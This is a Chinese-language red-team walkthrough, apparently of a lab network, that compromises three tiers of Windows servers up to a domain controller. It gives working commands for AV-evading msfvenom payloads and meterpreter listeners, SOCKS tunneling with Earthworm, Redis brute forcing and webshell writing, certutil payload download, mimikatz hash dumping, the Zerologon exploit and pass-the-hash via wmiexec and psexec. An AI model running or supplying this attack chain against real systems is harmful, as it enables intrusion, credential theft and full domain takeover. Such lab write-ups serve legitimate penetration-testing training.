前言 在红队攻防中,我们主要在外网进行信息收集,通过cms或者其他漏洞拿到shell,之后通过免杀木马将windows或linux服务器上线到cobalt strike或msf等c2服务器,之后对内网进行信息收集并绘制网络拓扑图,进行工作组或域渗透,拿到各个网段机器的权限,远程登陆并截图证明。
环境配置 从虚拟机网络来看
机器描述
攻击机:
win10:192.168.1.6
kali:192.168.1.10
第一层:12server-bt:
192.168.1.5
192.168.59.133
第二层:12server-redis:
192.168.59.4
10.10.10.202
第三层:
12server-ex13:
10.10.10.209
第三层:
12server-dc:
10.10.10.201
192.168.59.133 存在杀软(火绒), 可通外网, 可访问server-redis
192.168.59.4/10.10.10.202 不通外网,可以通内网两个机器,也可以访问到机器server-bt,
10.10.10.209 为邮服, 只能内网机器互相访问
10.10.10.201 为 DC
【一>所有资源获取<一】 1、200份很多已经买不到的绝版电子书 2、30G安全大厂内部的视频资料 3、100份src文档 4、常见安全面试题 5、ctf大赛经典题目解析 6、全套工具包 7、应急响应笔记 8、网络安全学习路线
目录如下
第一层 server-bt
蚁剑拿shell
msf免杀拿shell 使用msfvenom生成免杀木马payload,里面的IP和端口自行修改,就是反弹shell的kali
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=6666 -e x86/shikata_ga_nai -i 12 -f raw -o msf.bin
使用分离免杀工具生成loader.exe文件
对生成的exe文件进行加壳免杀
免杀效果如下
免杀之后通过蚁剑上传到server-bt上
msf开启监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set lport 6666
run
蚁剑运行
getuid 






run post/windows/gather/arp_scanner rhosts=192.168.59.0/24 

成功开启了远程桌面,并且生成了一个txt文件,这个txt文件往后可用来关闭远程桌面,关闭命令 run multi_console_command -r /root/.msf4/loot/xx_default_192.168.1.5_host.windows.cle_xxx5.txt 








第二层 server-redis
Earthworm穿透 上传EW(Earthworm)到C:/wwwroot/ 
execute C:\wwwroot\ew.exe -s ssocksd -l 1090 
$ vim /etc/proxychains.conf
socks5 192.168.1.5 1090

proxychains nmap -sT -Pn -p 80 192.168.59.0/24 
Redis-getshell
kali环境进行爆破 proxychains hydra -P /usr/xxx/password.lst 192.168.59.4 redis 6379 
proxychains src/redis-cli -h 192.168.59.4 -a 1xxxxx 
192.168.59.4:6379>config set dir "C:\\inetpub\\wwwroot" 进入默认目录
192.168.59.4:6379>config set dbfilename "redis.asp" 创建文件
192.168.59.4:6379>set x "<%eval request(\"chopper\")%>" 写入webshell
192.168.59.4:6379>save 最后保存
利用过程 




msf正向免杀木马拿到shell
Earthworm穿透 挂代理,通过之前上传的EW(Earthworm) 

$ vim /etc/proxychains.conf
socks5 192.168.1.5 1090
msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f raw -o msf1.bin
用msfvenom生成一个正向马传进去(因为无法访问外网,反向出不来),msf正向连接。 





C:\ProgramData\xxxx.exe -i -c "certutil -urlcache -split -f http://192.168.59.133/msf1.exe msf1.exe 

proxychains msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 192.168.59.4
set lport 4444
run


migrate 3992
getuid
getsystem
getuid

msf内网渗透
load mimikatz # 加载Mimikatz模块 
meterpreter > mimikatz_command -f samdump::hashes 



meterpreter > run autoroute -s 10.10.10.0/24 


nbtscan.exe 10.10.10.0/24 

proxychains curl 10.10.10.201
第三层 server-dc
zerologon(CVE-2020-1472)漏洞复现
这里已经满足触发zerologon的两个条件,能ping通域控制器,知道域控计算机名,当然最后dump出域内所有hash的时候需要域名 置空域控机器用户NTLM hash proxychains python3 cve-2020-1472-exploit.py 12server-dc$ 10.10.10.201 
(890c这个hash就是”空”的NTML hash)
我们的目标是获得域内administrator的hash,然后就可以hash传递,登陆任意域内机器
proxychains wmiexec.py -hashes :42e265xxxxxx62387 administrator@10.10.10.201

proxychains msfconsole
use exploit/windows/smb/psexec
set RHOST 10.10.10.201
set SMBUser Administrator
set SMBPass aad3bxxxxxxxx4ee:42e265xxxxxx962387
set SMBDomain xxxxx
set payload windows/x64/meterpreter/bind_tcp_rc4
set LPORT 4446
run


proxychains msfconsole
use exploit/windows/smb/psexec
set RHOST 10.10.10.209
set SMBUser Administrator
set SMBPass aad3bxxxxxxxee:42exxxxxxx387
set SMBDomain xxxx
set payload windows/x64/meterpreter/bind_tcp_rc4
set LPORT 4447
run
今天的文章安全攻防实战系列MSF分享到此就结束了,感谢您的阅读。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/13623.html